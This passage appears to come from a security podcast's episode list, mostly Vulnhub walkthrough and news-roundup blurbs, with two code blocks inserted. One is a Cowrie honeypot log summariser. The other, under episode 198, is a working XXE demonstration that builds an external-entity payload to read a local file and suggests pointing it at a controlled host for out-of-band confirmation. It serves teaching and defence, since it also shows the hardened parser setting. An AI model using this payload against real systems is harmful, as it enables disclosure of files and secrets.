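            if eid == "cowrie.login.success":
                successful_logins.append(
                    (event.get("src_ip"), event.get("username"), event.get("password"))
                )
        elif eid == "cowrie.command.input":
            commands_by_session[event.get("session")].append(event.get("input"))

    return {
        "attempts_per_ip": dict(attempts_per_ip),
        "top_credentials": credentials.most_common(3),
        "successful_logins": successful_logins,
        "commands_by_session": dict(commands_by_session),
    }


def report(text):
    """Parse and summarise a log; a convenience wrapper for stand-alone use."""
    return summarise(parse_log(text))


if __name__ == "__main__":
    summary = report(SAMPLE_LOG)
    for key, value in summary.items():
        print(f"{key}: {value}")
```

The same summary works on a Kippo-era install by pointing it at the database instead of the JSON file; the point of the example is that the honeypot's value is in the credentials and post-login commands, which is what you would feed into a blocklist or a threat-intel write-up.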

View this episode's show notes for more information.

177: A Not Totally Sucky Way to Backup and Share Photos

In this episode I talk about a not completely sucky way to backup and share photos seamlessly (almost) from multiple phones.

View this episode's show notes for more information.

178: Infosec News and Links Roundup

View this episode's show notes for more information.

179: Bring New Life to an Old Mac with OSX Server

In this episode I talk about how I took my aging Mac Mini and gave it some reasons to live! By installing a 20 dollar app you can make your old Mac cache software updates, host Time Machine network backups, become a DHCP/DNS server, push iPad policies and more!

View this episode's show notes for more information.

180: Vulnhub Walkthrough - Skydog CTF

The following is a semi-spoilerish walkthrough of the Skydog CTF VM from Vulnhub by James Bower.

View this episode's show notes for more information.

181: Infosec News and Links Roundup

View this episode's show notes for more information.

182: Vulnhub Walkthrough - SickOs

The following is a semi-spoilerish walkthrough of the SickOs VM from Vulnhub by D4rk.

View this episode's show notes for more information.

183: OFFTOPIC-The Invitation

A movie review of The Invitation.

View this episode's show notes for more information.

184: Infosec News and Links Roundup

View this episode's show notes for more information.

185: Vulnhub Walkthrough - Lord of the Root

The following is a semi-spoilerish walkthrough of the Lord of the Root VM from Vulnhub by KookSec.

View this episode's show notes for more information.

186: OFFTOPIC - Reviews of Brooklyn and The Revenant

Today's off-topic episode contains two mini movie reviews Brooklyn and The Revenant.

View this episode's show notes for more information.

187: Infosec News and Links Roundup

View this episode's show notes for more information.

188: Vulnhub Walkthrough - DroopyCTF

The following is a semi-spoilerish walkthrough of the DroopyCTF VM from Vulnhub by Knightmare.

View this episode's show notes for more information.

189: OFFTOPIC - Reviews of The Family Fang and Tumbledown

Today's off-topic episode features two mini movie reviews: The Family Fang and Tumbledown.

View this episode's show notes for more information.

190: Infosec News and Links Roundup

View this episode's show notes for more information.

191: Vulnhub Walkthrough - Kevgir

This is a semi-spoilerish walkthrough of the Kevgir VM from Vulnhub by canyoupwn.me.

View this episode's show notes for more information.

193: News and Links Roundup

View this episode's show notes for more information.

194: Vulnhub Walkthrough - Simple

The following is a semi-spoilerish walkthrough of the Simple VM from Vulnhub by @RobertWinkel.

View this episode's show notes for more information.

195: Why AppSpider is Grinding My Gears

This episode is why AppSpider is grinding my gears right now. I have found a site that, when scanned, will cause AppSpider to go ka-blooooey!

View this episode's show notes for more information.

196: News and Links Roundup

View this episode's show notes for more information.

197: Vulnhub Walkthrough - SickOS 1.2

The following is a semi-spoilerish walkthrough of the SickOS 1.2 VM from Vulnhub by @D4rk36.

View this episode's show notes for more information.

198: Two Pretty Cool Pentest Stories

  • One about finding a XXE vuln in a popular commercial product.

  • One about an employee who did a Webapp pentest on a product as it was being pitched to him
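The XXE bug in the first story is the classic shape: an XML parser that resolves external entities on input an attacker controls. The following is an added example, not code from the episode and not the product in question, that shows the difference using only the Python standard library. The same document is parsed twice with `xml.sax`, once with the `external-general-entities` feature switched on (the vulnerable configuration) and once with it off. The "secret" file, its contents and the XML document are constructed for the demo.

```python
"""XXE in miniature: one document, parsed with and without external
entity resolution.  Added example, not from the podcast.  The secret file
and the XML payload are constructed for the demo.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax import handler
from xml.sax.handler import ContentHandler


class CommentCollector(ContentHandler):
    """Collects the character data found inside <comment> elements."""

    def __init__(self):
        super().__init__()
        self._inside = False
        self.text = []

    def startElement(self, name, attrs):
        if name == "comment":
            self._inside = True

    def endElement(self, name):
        if name == "comment":
            self._inside = False

    def characters(self, content):
        if self._inside:
            self.text.append(content)


def parse_comment(xml_bytes, allow_external_entities):
    """Return the text of <comment>, honouring the entity-resolution setting.

    feature_external_ges=True is the vulnerable configuration: an
    <!ENTITY ... SYSTEM "..."> declaration is fetched and its contents are
    inlined.  False (CPython's default since 3.7.1) leaves the entity unresolved.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, allow_external_entities)
    collector = CommentCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.text)


def build_payload(secret_path):
    """An attacker-style document that points an entity at a local file."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE review [\n"
        f'  <!ENTITY xxe SYSTEM "{secret_path}">\n'
        "]>\n"
        "<review><comment>&xxe;</comment></review>\n"
    ).encode()


def xxe_demo():
    """Run the payload through both configurations and return what leaked."""
    # Constructed secret: stands in for /etc/passwd or a config file.
    with tempfile.NamedTemporaryFile("w", delete=False, suffix=".txt") as f:
        f.write("db_password=hunter2")
        secret_path = f.name
    try:
        payload = build_payload(secret_path)
        return {
            "vulnerable": parse_comment(payload, allow_external_entities=True),
            "hardened": parse_comment(payload, allow_external_entities=False),
        }
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    for mode, leaked in xxe_demo().items():
        print(f"{mode}: {leaked!r}")
```

When testing a product, the same payload with the `SYSTEM` identifier pointed at a host you control is the quickest way to confirm out-of-band resolution even when nothing is echoed back; on the defensive side, the fix is the second configuration, and other parsers have had different defaults over the years, so check the one in use rather than assuming.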

View this episode's show notes for more information.

199: News and Links Roundup

View this episode's show notes for more information.

200: Vulnhub Walkthrough - Milnet

The following is a semi-spoilerish walkthrough of the Milnet VM from Vulnhub by @teh_warriar.

View this episode's show notes for more information.

201: OFF-TOPIC - Audio Clip Extravaganza

In this first ever 7MS audio clip extravaganza, I offer the following two mini-journeys for your ears:

  1. I get my young son red hot mad at me as I sing I See the Moon and even some Beyonce tunes to cheer him up.

  2. I entered a contest to remix a Barenaked Ladies song (Easy), but they wouldn't even accept my entry! Maybe you will :'(

View this episode's show notes for more information.

202: News and Links Roundup

View this episode's show notes for more information.

204: OFF-TOPIC - IT Horror Stories!

Today's off-topic show is one of my favorite IT horror stories, featuring a red-hot angry lawyer who was having password issues. I had the joy of dealing with his hair-trigger temper on a Saturday over a crappy cell phone connection.

View this episode's show notes for more information.

205: News and Links Roundup

View this episode's show notes for more information.

206: Vulnhub Walkthrough - Stapler

The following is a semi-spoilerish walkthrough of the Stapler VM from Vulnhub by g0tmi1k.

View this episode's show notes for more information.

207: Vulnhub Walkthrough - Sidney

The following is a semi-spoilerish walkthrough of the Sidney VM from Vulnhub by Knightmare2600.

View this episode's show notes for more information.

208: OFF-TOPIC - The Jackwagon Who Stole My Drums!

This off-topic episode is about a "friend" (I'm using air quotes) of mine who stole a set of drums from me. Then he sold them for dirt cheap, promised to pay me back (but didn't) and forced me to take him to court. "Fun stuff!" Brian said sarcastically! Tune into today's episode to see where this heated legal battle is at.

View this episode's show notes for more information.

209: News and Links Roundup

View this episode's show notes for more information.

210: Vulnhub Walkthrough - Mr. Robot

The following is a semi-spoilerish walkthrough of the Mr. Robot VM from Vulnhub by Jason (couldn't find a link for him! Hrmm....mysterious!).

View this episode's show notes for more information.

211: OFF-TOPIC - IT Horror Stories - Part 2

In today's episode I share some big news (SPOILER ALERT: I'm building a vulnhub.com vulnerable VM!) and also tell you about a client that was happy to pay me to watch progress bars for hours, but not happy to give me a 15 minute break for dinner.

View this episode's show notes for more information.

212: News and Links Roundup

View this episode's show notes for more information.

213: Building a Vulnerable VM (The Prequel)

In this episode, I share a short list of virtual landmines you'll want to avoid when building your vulnerable VM for vulnhub.com.

View this episode's show notes for more information.

214: News and Links Roundup

View this episode's show notes for more information.

215: Installing Ubiquiti EdgeRouter X and AP - Part 1

In today's episode I kick off a multi-part series on ditching my previously beloved Almond router in favor of a Ubiquiti EdgeRouter X and access point.

View this episode's show notes for more information.

216: News and Links Roundup

View this episode's show notes for more information.

217: Installing Ubiquiti EdgeRouter X and AP - Part 2

Continuation of the series started in episode #215.

View this episode's show notes for more information.

218: OFF-TOPIC - My Top 5 Favorite and Least Favorite Things About The Division

In today's off-topic episode I talk about my 5 favorite (and least favorite) things about Tom Clancy's The Division for Xbox One. Topics include: dumb boss battles, phantoms and floaters, and unnecessary celebrations.

View this episode's show notes for more information.

219: News and Links Roundup

View this episode's show notes for more information.

220: Installing Ubiquiti EdgeRouter X and AP - Part 3

Conclusion of the Ubiquiti series - see #215 and #217 for parts 1 and 2.

View this episode's show notes for more information.

221: News and Links Roundup

View this episode's show notes for more information.

222: OFF-TOPIC - THE FINAL CHAPTER!

This episode is the good/bad news of why I won't be doing off-topic episodes anymore.

View this episode's show notes for more information.

223: Vulnhub Walkthrough - Tommy Boy

The following is a semi-spoilerish walkthrough of the vulnerable Tommy Boy VM, hosted on Vulnhub.

View this episode's show notes for more information.

224: DIY 500 Dollar Pentesting Lab - Part 1

This episode is part 1 of a series all about setting up a virtual pentesting lab for about 500 bucks. We're kicking off the series with a segment on selecting hardware, getting ESXi installed to a USB drive and then getting all the components hooked up and powered on.

View this episode's show notes for more information.

225: DIY 500 Dollar Pentesting Lab - Part 2

This episode is part 2 of a series all about setting up a virtual pentesting lab for about 500 bucks. Part 1 talked about getting the necessary hardware purchased and assembled. Today we talk about the network/storage configuration.

View this episode's show notes for more information.

226: DIY 500 Dollar Pentesting Lab - Part 3

This episode is part 3 of a series all about setting up a virtual pentesting lab for about 500 bucks. Part 1 talked about getting the necessary hardware purchased and assembled. Part 2 covered network/storage configuration.

View this episode's show notes for more information.

227: Lets Encrypt - Installing SSL Certs for Nessus and Ubiquiti Unifi

Back in episode #220 I went through how to get a cloud-hosted UniFi controller setup so you could do cool things like implement a voucher system for your guests. A next natural step is securing the controller with a proper SSL cert, and thanks to this great article from Steve Jenkins, it's not as hard as it might look. I use it as the backbone of my video demo.

View this episode's show notes for more information.

228: Fun with Bettercap

All about installing, configuring and using Bettercap.

View this episode's show notes for more information.

229: Intro to Docker for Pentesters

I know I'm old and unhip, but I just got turned on to Docker, and in this episode I wanted to share two cool ways to use it to beef up your pentest skills.

View this episode's show notes for more information.

230: Pentesting OWASP Juice Shop - Part 1

This episode is part of a series on hacking the OWASP Juice Shop which is "an intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws."

View this episode's show notes for more information.

231: Pentesting OWASP Juice Shop - Part 2

This episode is part of a series on hacking the OWASP Juice Shop which is "an intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws."

View this episode's show notes for more information.

232: Pentesting OWASP Juice Shop - Part 3

This episode is part of a series on hacking the OWASP Juice Shop which is "an intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws."

View this episode's show notes for more information.

233: Pentesting OWASP Juice Shop - Part 4

This episode is part of a series on hacking the OWASP Juice Shop which is "an intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws."

View this episode's show notes for more information.

234: Pentesting OWASP Juice Shop - Part 5

This episode is part of a series on hacking the OWASP Juice Shop which is "an intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws."

View this episode's show notes for more information.